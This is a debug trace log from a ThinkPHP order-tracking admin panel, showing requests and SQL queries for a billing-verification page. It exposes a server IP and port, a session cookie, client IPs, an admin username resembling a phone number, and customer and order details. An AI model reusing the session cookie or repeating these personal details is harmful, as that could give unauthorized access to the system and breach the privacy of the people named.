ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.023447s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.022879s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11824 [ RunTime:0.015066s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11823 [ RunTime:0.014576s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11822 [ RunTime:0.014384s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11821 [ RunTime:0.014306s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11820 [ RunTime:0.014155s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11819 [ RunTime:0.014292s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11814 [ RunTime:0.014813s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11813 [ RunTime:0.014705s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11812 [ RunTime:0.014294s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11811 [ RunTime:0.014199s ] --------------------------------------------------------------- [ 2025-12-14T16:59:36+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/hedui/ids/11824?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11824?dialog=1 [运行时间:0.081851s][吞吐率:12.22req/s] [内存消耗:6,274.74kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001129s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '11824', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001471s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000122s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000394s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000671s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000715s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000880s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001103s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000998s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000476s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000793s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001002s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000757s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000711s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000788s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11824' [ RunTime:0.015603s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1484 LIMIT 1 [ RunTime:0.000472s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1153 LIMIT 1 [ RunTime:0.000275s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1069 LIMIT 1 [ RunTime:0.000312s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1022 LIMIT 1 [ RunTime:0.000337s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 11824 LIMIT 1 [ RunTime:0.000326s ] --------------------------------------------------------------- [ 2025-12-14T16:59:37+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702776 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702776 [运行时间:0.031247s][吞吐率:32.00req/s] [内存消耗:3,850.14kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001116s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11824?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1765702776', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001525s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000097s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:59:38+08:00 ] 106.112.204.117 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.050046s][吞吐率:19.98req/s] [内存消耗:5,010.32kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001205s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11824?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '249', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '249', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001572s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007159s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000398s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000827s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (249) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000356s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (249) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000490s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000686s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"249\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"249\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702778) [ RunTime:0.005155s ] --------------------------------------------------------------- [ 2025-12-14T17:00:07+08:00 ] 106.112.204.117 POST /admin/financial/verifybill/hedui/ids/11824?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11824?dialog=1 [运行时间:0.192599s][吞吐率:5.19req/s] [内存消耗:6,224.50kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001404s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '683', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11824?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '孙建军', 1 => '249', ), 'verify_amount' => array ( 0 => '2048', 1 => '2048', 2 => '2048', 3 => '4096', ), 'price' => array ( 0 => '7.76', 1 => '2.1600000000', 2 => '0.5000000000', 3 => '0.0400000000', ), 'money' => array ( 0 => '15892.48', 1 => '4423.6800000000', 2 => '1024.0000000000', 3 => '163.8400000000', ), 'explain' => array ( 0 => '400W-10底壳1.5厚2048个', 1 => '400W-2上盖2048个', 2 => '400W-3散热器12048个', 3 => '大弯压板4096个', ), 'shoukuan_status-1' => '1', 'shoukuan_status-2' => '1', 'shoukuan_status-3' => '1', 'shoukuan_status-4' => '1', 'ids' => '11824', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001746s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008744s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000469s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001007s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000444s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000685s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001140s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001176s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000436s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000760s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001218s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000969s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000973s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000722s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime 